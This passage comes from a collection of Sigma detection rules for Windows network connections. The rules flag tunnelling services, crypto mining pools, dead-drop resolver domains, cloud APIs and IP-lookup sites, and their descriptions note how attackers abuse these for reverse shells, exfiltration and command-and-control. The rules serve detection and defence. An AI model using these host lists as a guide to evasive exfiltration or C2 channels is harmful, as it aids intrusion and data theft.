'\\Flock.exe'\n    filter_main_phoebe:\n        Image|contains: '\\AppData\\Local\\Phoebe\\'\n        Image|endswith: '\\Phoebe.exe'\n    filter_main_falkon:\n        Image|startswith:\n            - 'C:\\Program Files\\Falkon\\'\n            - 'C:\\Program Files (x86)\\Falkon\\'\n        Image|endswith: '\\falkon.exe'\n    filter_main_qtweb:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\QtWeb\\'\n            - 'C:\\Program Files\\QtWeb\\'\n        Image|endswith: '\\QtWeb.exe'\n    filter_main_avant:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avant Browser\\'\n            - 'C:\\Program Files\\Avant Browser\\'\n        Image|endswith: '\\avant.exe'\n    filter_main_discord:\n        Image|contains: '\\AppData\\Local\\Discord\\'\n        Image|endswith: '\\Discord.exe'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    # filter_optional_qlik:\n    #     Image|endswith: '\\Engine.exe' # Process from qlik.com app\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_btunnels.yml",
    "content": "title: Network Connection Initiated To BTunnels Domains\nid: 9e02c8ec-02b9-43e8-81eb-34a475ba7965\nstatus: test\ndescription: |\n    Detects network connections to BTunnels domains initiated by a process on the system.\n    Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/\nauthor: Kamran Saifullah\ndate: 2024-09-13\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1572\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: '.btunnel.co.in'\n    condition: selection\nfalsepositives:\n    - Legitimate use of BTunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_cloudflared_communication.yml",
    "content": "title: Network Connection Initiated To Cloudflared Tunnels Domains\nid: 7cd1dcdc-6edf-4896-86dc-d1f19ad64903\nrelated:\n    - id: a1d9eec5-33b2-4177-8d24-27fe754d0812\n      type: derived\nstatus: test\ndescription: |\n    Detects network connections to Cloudflared tunnels domains initiated by a process on the system.\n    Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n    - Internal Research\nauthor: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-05-27\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1572\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.v2.argotunnel.com'\n            - 'protocol-v2.argotunnel.com'\n            - 'trycloudflare.com'\n            - 'update.argotunnel.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of cloudflare tunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_crypto_mining_pools.yml",
    "content": "title: Network Communication With Crypto Mining Pool\nid: fa5b1358-b040-4403-9868-15f7d9ab6329\nstatus: stable\ndescription: Detects initiated network connections to crypto mining pools\nreferences:\n    - https://www.poolwatch.io/coin/monero\n    - https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt\n    - https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-10-26\nmodified: 2024-01-19\ntags:\n    - attack.impact\n    - attack.t1496\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationHostname:\n            - 'alimabi.cn'\n            - 'ap.luckpool.net'\n            - 'bcn.pool.minergate.com'\n            - 'bcn.vip.pool.minergate.com'\n            - 'bohemianpool.com'\n            - 'ca-aipg.miningocean.org'\n            - 'ca-dynex.miningocean.org'\n            - 'ca-neurai.miningocean.org'\n            - 'ca-qrl.miningocean.org'\n            - 'ca-upx.miningocean.org'\n            - 'ca-zephyr.miningocean.org'\n            - 'ca.minexmr.com'\n            - 'ca.monero.herominers.com'\n            - 'cbd.monerpool.org'\n            - 'cbdv2.monerpool.org'\n            - 'cryptmonero.com'\n            - 'crypto-pool.fr'\n            - 'crypto-pool.info'\n            - 'cryptonight-hub.miningpoolhub.com'\n            - 'd1pool.ddns.net'\n            - 'd5pool.us'\n            - 'daili01.monerpool.org'\n            - 'de-aipg.miningocean.org'\n            - 'de-dynex.miningocean.org'\n            - 'de-zephyr.miningocean.org'\n            - 'de.minexmr.com'\n            - 'dl.nbminer.com'\n            - 'donate.graef.in'\n            - 'donate.ssl.xmrig.com'\n            - 'donate.v2.xmrig.com'\n            - 'donate.xmrig.com'\n            - 'donate2.graef.in'\n            - 
'drill.moneroworld.com'\n            - 'dwarfpool.com'\n            - 'emercoin.com'\n            - 'emercoin.net'\n            - 'emergate.net'\n            - 'ethereumpool.co'\n            - 'eu.luckpool.net'\n            - 'eu.minerpool.pw'\n            - 'fcn-xmr.pool.minergate.com'\n            - 'fee.xmrig.com'\n            - 'fr-aipg.miningocean.org'\n            - 'fr-dynex.miningocean.org'\n            - 'fr-neurai.miningocean.org'\n            - 'fr-qrl.miningocean.org'\n            - 'fr-upx.miningocean.org'\n            - 'fr-zephyr.miningocean.org'\n            - 'fr.minexmr.com'\n            - 'hellominer.com'\n            - 'herominers.com'\n            - 'hk-aipg.miningocean.org'\n            - 'hk-dynex.miningocean.org'\n            - 'hk-neurai.miningocean.org'\n            - 'hk-qrl.miningocean.org'\n            - 'hk-upx.miningocean.org'\n            - 'hk-zephyr.miningocean.org'\n            - 'huadong1-aeon.ppxxmr.com'\n            - 'iwanttoearn.money'\n            - 'jw-js1.ppxxmr.com'\n            - 'koto-pool.work'\n            - 'lhr.nbminer.com'\n            - 'lhr3.nbminer.com'\n            - 'linux.monerpool.org'\n            - 'lokiturtle.herominers.com'\n            - 'luckpool.net'\n            - 'masari.miner.rocks'\n            - 'mine.c3pool.com'\n            - 'mine.moneropool.com'\n            - 'mine.ppxxmr.com'\n            - 'mine.zpool.ca'\n            - 'mine1.ppxxmr.com'\n            - 'minemonero.gq'\n            - 'miner.ppxxmr.com'\n            - 'miner.rocks'\n            - 'minercircle.com'\n            - 'minergate.com'\n            - 'minerpool.pw'\n            - 'minerrocks.com'\n            - 'miners.pro'\n            - 'minerxmr.ru'\n            - 'minexmr.cn'\n            - 'minexmr.com'\n            - 'mining-help.ru'\n            - 'miningpoolhub.com'\n            - 'mixpools.org'\n            - 'moner.monerpool.org'\n            - 'moner1min.monerpool.org'\n            - 'monero-master.crypto-pool.fr'\n      
      - 'monero.crypto-pool.fr'\n            - 'monero.hashvault.pro'\n            - 'monero.herominers.com'\n            - 'monero.lindon-pool.win'\n            - 'monero.miners.pro'\n            - 'monero.riefly.id'\n            - 'monero.us.to'\n            - 'monerocean.stream'\n            - 'monerogb.com'\n            - 'monerohash.com'\n            - 'moneroocean.stream'\n            - 'moneropool.com'\n            - 'moneropool.nl'\n            - 'monerorx.com'\n            - 'monerpool.org'\n            - 'moriaxmr.com'\n            - 'mro.pool.minergate.com'\n            - 'multipool.us'\n            - 'myxmr.pw'\n            - 'na.luckpool.net'\n            - 'nanopool.org'\n            - 'nbminer.com'\n            - 'node3.luckpool.net'\n            - 'noobxmr.com'\n            - 'pangolinminer.comgandalph3000.com'\n            - 'pool.4i7i.com'\n            - 'pool.armornetwork.org'\n            - 'pool.cortins.tk'\n            - 'pool.gntl.co.uk'\n            - 'pool.hashvault.pro'\n            - 'pool.minergate.com'\n            - 'pool.minexmr.com'\n            - 'pool.monero.hashvault.pro'\n            - 'pool.ppxxmr.com'\n            - 'pool.somec.cc'\n            - 'pool.support'\n            - 'pool.supportxmr.com'\n            - 'pool.usa-138.com'\n            - 'pool.xmr.pt'\n            - 'pool.xmrfast.com'\n            - 'pool2.armornetwork.org'\n            - 'poolchange.ppxxmr.com'\n            - 'pooldd.com'\n            - 'poolmining.org'\n            - 'poolto.be'\n            - 'ppxvip1.ppxxmr.com'\n            - 'ppxxmr.com'\n            - 'prohash.net'\n            - 'r.twotouchauthentication.online'\n            - 'randomx.xmrig.com'\n            - 'ratchetmining.com'\n            - 'seed.emercoin.com'\n            - 'seed.emercoin.net'\n            - 'seed.emergate.net'\n            - 'seed1.joulecoin.org'\n            - 'seed2.joulecoin.org'\n            - 'seed3.joulecoin.org'\n            - 'seed4.joulecoin.org'\n            - 
'seed5.joulecoin.org'\n            - 'seed6.joulecoin.org'\n            - 'seed7.joulecoin.org'\n            - 'seed8.joulecoin.org'\n            - 'sg-aipg.miningocean.org'\n            - 'sg-dynex.miningocean.org'\n            - 'sg-neurai.miningocean.org'\n            - 'sg-qrl.miningocean.org'\n            - 'sg-upx.miningocean.org'\n            - 'sg-zephyr.miningocean.org'\n            - 'sg.minexmr.com'\n            - 'sheepman.mine.bz'\n            - 'siamining.com'\n            - 'sumokoin.minerrocks.com'\n            - 'supportxmr.com'\n            - 'suprnova.cc'\n            - 'teracycle.net'\n            - 'trtl.cnpool.cc'\n            - 'trtl.pool.mine2gether.com'\n            - 'turtle.miner.rocks'\n            - 'us-aipg.miningocean.org'\n            - 'us-dynex.miningocean.org'\n            - 'us-neurai.miningocean.org'\n            - 'us-west.minexmr.com'\n            - 'us-zephyr.miningocean.org'\n            - 'usxmrpool.com'\n            - 'viaxmr.com'\n            - 'webservicepag.webhop.net'\n            - 'xiazai.monerpool.org'\n            - 'xiazai1.monerpool.org'\n            - 'xmc.pool.minergate.com'\n            - 'xmo.pool.minergate.com'\n            - 'xmr-asia1.nanopool.org'\n            - 'xmr-au1.nanopool.org'\n            - 'xmr-eu1.nanopool.org'\n            - 'xmr-eu2.nanopool.org'\n            - 'xmr-jp1.nanopool.org'\n            - 'xmr-us-east1.nanopool.org'\n            - 'xmr-us-west1.nanopool.org'\n            - 'xmr-us.suprnova.cc'\n            - 'xmr-usa.dwarfpool.com'\n            - 'xmr.2miners.com'\n            - 'xmr.5b6b7b.ru'\n            - 'xmr.alimabi.cn'\n            - 'xmr.bohemianpool.com'\n            - 'xmr.crypto-pool.fr'\n            - 'xmr.crypto-pool.info'\n            - 'xmr.f2pool.com'\n            - 'xmr.hashcity.org'\n            - 'xmr.hex7e4.ru'\n            - 'xmr.ip28.net'\n            - 'xmr.monerpool.org'\n            - 'xmr.mypool.online'\n            - 'xmr.nanopool.org'\n            - 
'xmr.pool.gntl.co.uk'\n            - 'xmr.pool.minergate.com'\n            - 'xmr.poolto.be'\n            - 'xmr.ppxxmr.com'\n            - 'xmr.prohash.net'\n            - 'xmr.simka.pw'\n            - 'xmr.somec.cc'\n            - 'xmr.suprnova.cc'\n            - 'xmr.usa-138.com'\n            - 'xmr.vip.pool.minergate.com'\n            - 'xmr1min.monerpool.org'\n            - 'xmrf.520fjh.org'\n            - 'xmrf.fjhan.club'\n            - 'xmrfast.com'\n            - 'xmrigcc.graef.in'\n            - 'xmrminer.cc'\n            - 'xmrpool.de'\n            - 'xmrpool.eu'\n            - 'xmrpool.me'\n            - 'xmrpool.net'\n            - 'xmrpool.xyz'\n            - 'xx11m.monerpool.org'\n            - 'xx11mv2.monerpool.org'\n            - 'xxx.hex7e4.ru'\n            - 'zarabotaibitok.ru'\n            - 'zer0day.ru'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_dead_drop_resolvers.yml",
    "content": "title: New Connection Initiated To Potential Dead Drop Resolver Domain\nid: 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7\nrelated:\n    - id: d7b09985-95a3-44be-8450-b6eadf49833e\n      type: obsolete\nstatus: test\ndescription: |\n    Detects an executable, which is not an internet browser or known application, initiating network connections to legitimate popular websites, which were seen to be used as dead drop resolvers in previous attacks.\n    In this context, attackers leverage well-known websites such as \"facebook\", \"youtube\", etc. in order to pass through undetected.\nreferences:\n    - https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/\n    - https://securelist.com/the-tetrade-brazilian-banking-malware/97779/\n    - https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html\n    - https://github.com/kleiton0x00/RedditC2\n    - https://twitter.com/kleiton0x7e/status/1600567316810551296\n    - https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al\nauthor: Sorina Ionescu, X__Junior (Nextron Systems)\ndate: 2022-08-17\nmodified: 2024-10-21\ntags:\n    - attack.command-and-control\n    - attack.t1102\n    - attack.t1102.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.t.me'\n            - '4shared.com'\n            - 'abuse.ch'\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'cloudflare.com'\n            - 'ddns.net'\n            - 'discord.com'\n            - 'docs.google.com'\n            - 'drive.google.com'\n            - 'dropbox.com'\n            - 'dropmefiles.com'\n            - 'facebook.com'\n            - 'feeds.rapidfeeds.com'\n            - 'fotolog.com'\n            - 'ghostbin.co'\n            - 'githubusercontent.com'\n            
- 'gofile.io'\n            - 'hastebin.com'\n            - 'imgur.com'\n            - 'livejournal.com'\n            - 'mediafire.com'\n            - 'mega.co.nz'\n            - 'mega.nz'\n            - 'onedrive.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'reddit.com'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'steamcommunity.com'\n            - 'storage.googleapis.com'\n            - 'technet.microsoft.com'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'twitter.com'\n            - 'ufile.io'\n            - 'vimeo.com'\n            - 'w3spaces.com'\n            - 'wetransfer.com'\n            - 'workers.dev'\n            - 'youtube.com'\n    # Note: Add/Remove browsers/applications that you don't use or those that have custom install locations\n    # Note: To avoid complex conditions the filters for some apps are generic by name only. 
A custom tuning is recommended for best results\n    filter_main_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_chrome_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_main_firefox_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Mozilla Firefox\\firefox.exe'\n    filter_main_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_main_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_main_safari:\n        Image|contains:\n            - 'C:\\Program Files (x86)\\Safari\\'\n            - 'C:\\Program Files\\Safari\\'\n        Image|endswith: '\\safari.exe'\n    filter_main_defender:\n        Image|contains:\n            - 'C:\\Program Files\\Windows Defender Advanced Threat Protection\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        
Image|endswith:\n            - '\\MsMpEng.exe' # Microsoft Defender executable\n            - '\\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable\n    filter_main_prtg:\n        # Paessler's PRTG Network Monitor\n        Image|endswith:\n            - 'C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe'\n            - 'C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe'\n    filter_main_brave:\n        Image|startswith: 'C:\\Program Files\\BraveSoftware\\'\n        Image|endswith: '\\brave.exe'\n    filter_main_maxthon:\n        Image|contains: '\\AppData\\Local\\Maxthon\\'\n        Image|endswith: '\\maxthon.exe'\n    filter_main_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_main_seamonkey:\n        Image|startswith:\n            - 'C:\\Program Files\\SeaMonkey\\'\n            - 'C:\\Program Files (x86)\\SeaMonkey\\'\n        Image|endswith: '\\seamonkey.exe'\n    filter_main_vivaldi:\n        Image|contains: '\\AppData\\Local\\Vivaldi\\'\n        Image|endswith: '\\vivaldi.exe'\n    filter_main_whale:\n        Image|startswith:\n            - 'C:\\Program Files\\Naver\\Naver Whale\\'\n            - 'C:\\Program Files (x86)\\Naver\\Naver Whale\\'\n        Image|endswith: '\\whale.exe'\n    # Note: The TOR browser shouldn't be something you allow in your corporate network.\n    # filter_main_tor:\n    #     Image|contains: '\\Tor Browser\\'\n    filter_main_waterfox:\n        Image|startswith:\n            - 'C:\\Program Files\\Waterfox\\'\n            - 'C:\\Program Files (x86)\\Waterfox\\'\n        Image|endswith: '\\Waterfox.exe'\n    filter_main_midori:\n        Image|contains: '\\AppData\\Local\\Programs\\midori-ng\\'\n        Image|endswith: '\\Midori Next Generation.exe'\n    filter_main_slimbrowser:\n        Image|startswith:\n            - 'C:\\Program Files\\SlimBrowser\\'\n            - 'C:\\Program Files (x86)\\SlimBrowser\\'\n        
Image|endswith: '\\slimbrowser.exe'\n    filter_main_flock:\n        Image|contains: '\\AppData\\Local\\Flock\\'\n        Image|endswith: '\\Flock.exe'\n    filter_main_phoebe:\n        Image|contains: '\\AppData\\Local\\Phoebe\\'\n        Image|endswith: '\\Phoebe.exe'\n    filter_main_falkon:\n        Image|startswith:\n            - 'C:\\Program Files\\Falkon\\'\n            - 'C:\\Program Files (x86)\\Falkon\\'\n        Image|endswith: '\\falkon.exe'\n    filter_main_qtweb:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\QtWeb\\'\n            - 'C:\\Program Files\\QtWeb\\'\n        Image|endswith: '\\QtWeb.exe'\n    filter_main_avant:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avant Browser\\'\n            - 'C:\\Program Files\\Avant Browser\\'\n        Image|endswith: '\\avant.exe'\n    filter_main_whatsapp:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\WindowsApps\\'\n            - 'C:\\Program Files\\WindowsApps\\'\n        Image|endswith: '\\WhatsApp.exe'\n        DestinationHostname|endswith: 'facebook.com'\n    filter_main_telegram:\n        Image|contains: '\\AppData\\Roaming\\Telegram Desktop\\'\n        Image|endswith: '\\Telegram.exe'\n        DestinationHostname|endswith: '.t.me'\n    filter_main_onedrive:\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n        Image|endswith: '\\OneDrive.exe'\n        DestinationHostname|endswith: 'onedrive.com'\n    filter_main_dropbox:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Dropbox\\Client\\'\n            - 'C:\\Program Files\\Dropbox\\Client\\'\n        Image|endswith:\n            - '\\Dropbox.exe'\n            - '\\DropboxInstaller.exe'\n        DestinationHostname|endswith: 'dropbox.com'\n    filter_main_mega:\n        Image|endswith:\n            # Note: This is a basic/best effort filter in order to avoid FP with the MEGA installer and executable.\n            #       In practice please apply 
exact path to avoid basic path bypass techniques.\n            - '\\MEGAsync.exe'\n            - '\\MEGAsyncSetup32_*RC.exe' # Beta versions\n            - '\\MEGAsyncSetup32.exe' # Installers 32bit\n            - '\\MEGAsyncSetup64.exe' # Installers 64bit\n            - '\\MEGAupdater.exe'\n        DestinationHostname|endswith:\n            - 'mega.co.nz'\n            - 'mega.nz'\n    filter_main_googledrive:\n        Image|contains:\n            - 'C:\\Program Files\\Google\\Drive File Stream\\'\n            - 'C:\\Program Files (x86)\\Google\\Drive File Stream\\'\n        Image|endswith: 'GoogleDriveFS.exe'\n        DestinationHostname|endswith: 'drive.google.com'\n    filter_main_discord:\n        Image|contains: '\\AppData\\Local\\Discord\\'\n        Image|endswith: '\\Discord.exe'\n        DestinationHostname|endswith:\n            - 'discord.com'\n            - 'cdn.discordapp.com'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    # filter_optional_qlik:\n    #     Image|endswith: '\\Engine.exe' # Process from qlik.com app\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - One might need to exclude other internet browsers found in its network or other applications like the ones mentioned above from Microsoft Defender.\n    - Ninite contacting githubusercontent.com\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_devtunnels.yml",
    "content": "title: Network Connection Initiated To DevTunnels Domain\nid: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4\nrelated:\n    - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode\n      type: similar\n    - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode\n      type: similar\n    - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels\n      type: similar\nstatus: test\ndescription: |\n    Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2\n    - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security\n    - https://cydefops.com/devtunnels-unleashed\nauthor: Kamran Saifullah\ndate: 2023-11-20\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567.001\n    - attack.t1572\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: '.devtunnels.ms'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Devtunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_dropbox_api.yml",
    "content": "title: Suspicious Dropbox API Usage\nid: 25eabf56-22f0-4915-a1ed-056b8dae0a68\nstatus: test\ndescription: Detects an executable that isn't dropbox but communicates with the Dropbox API\nreferences:\n    - https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb\n    - https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-20\ntags:\n    - attack.command-and-control\n    - attack.exfiltration\n    - attack.t1105\n    - attack.t1567.002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - 'api.dropboxapi.com'\n            - 'content.dropboxapi.com'\n    filter_main_legit_dropbox:\n        # Note: It's better to add a specific path to the exact location(s) where dropbox is installed\n        Image|contains: '\\Dropbox'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use of the API with a tool that the author wasn't aware of\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_external_ip_lookup.yml",
    "content": "title: Suspicious Network Connection to IP Lookup Service APIs\nid: edf3485d-dac4-4d50-90e4-b0e5813f7e60\nrelated:\n    - id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2\n      type: derived\nstatus: test\ndescription: Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.\nreferences:\n    - https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a\n    - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\n    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nauthor: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-24\nmodified: 2024-03-22\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        - DestinationHostname:\n              - 'www.ip.cn'\n              - 'l2.io'\n        - DestinationHostname|contains:\n              - 'api.2ip.ua'\n              - 'api.bigdatacloud.net'\n              - 'api.ipify.org'\n              - 'bot.whatismyipaddress.com'\n              - 'canireachthe.net'\n              - 'checkip.amazonaws.com'\n              - 'checkip.dyndns.org'\n              - 'curlmyip.com'\n              - 'db-ip.com'\n              - 'edns.ip-api.com'\n              - 'eth0.me'\n              - 'freegeoip.app'\n              - 'geoipy.com'\n              - 'getip.pro'\n              - 'icanhazip.com'\n              - 'ident.me'\n              - 'ifconfig.io'\n              - 'ifconfig.me'\n              - 'ip-api.com'\n              - 'ip.360.cn'\n              - 'ip.anysrc.net'\n              - 'ip.taobao.com'\n              - 'ip.tyk.nu'\n              - 
'ipaddressworld.com'\n              - 'ipapi.co'\n              - 'ipconfig.io'\n              - 'ipecho.net'\n              - 'ipinfo.io'\n              - 'ipip.net'\n              - 'ipof.in'\n              - 'ipv4.icanhazip.com'\n              - 'ipv4bot.whatismyipaddress.com'\n              - 'ipv6-test.com'\n              - 'ipwho.is'\n              - 'jsonip.com'\n              - 'myexternalip.com'\n              - 'seeip.org'\n              - 'wgetip.com'\n              - 'whatismyip.akamai.com'\n              - 'whois.pconline.com.cn'\n              - 'wtfismyip.com'\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    
filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate use of the external websites for troubleshooting or network monitoring\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_google_api_non_browser_access.yml",
    "content": "title: Suspicious Non-Browser Network Communication With Google API\nid: 7e9cf7b6-e827-11ed-a05b-0242ac120003\nstatus: experimental\ndescription: |\n    Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)\nreferences:\n    - https://github.com/looCiprian/GC2-sheet\n    - https://youtu.be/n2dFlSaBBKo\n    - https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf\n    - https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/\n    - https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/\nauthor: Gavin Knapp\ndate: 2023-05-01\nmodified: 2025-02-22\ntags:\n    - attack.command-and-control\n    - attack.t1102\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains:\n            # Note: Please add additional google API related domains that might be abused.\n            - 'drive.googleapis.com'\n            - 'oauth2.googleapis.com'\n            - 'sheets.googleapis.com'\n            - 'www.googleapis.com'\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image|endswith:\n            - ':\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - ':\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_google_drive:\n        Image|contains: ':\\Program Files\\Google\\Drive File Stream\\'\n        Image|endswith: '\\GoogleDriveFS.exe'\n    filter_optional_firefox:\n        Image|endswith:\n            - ':\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - ':\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        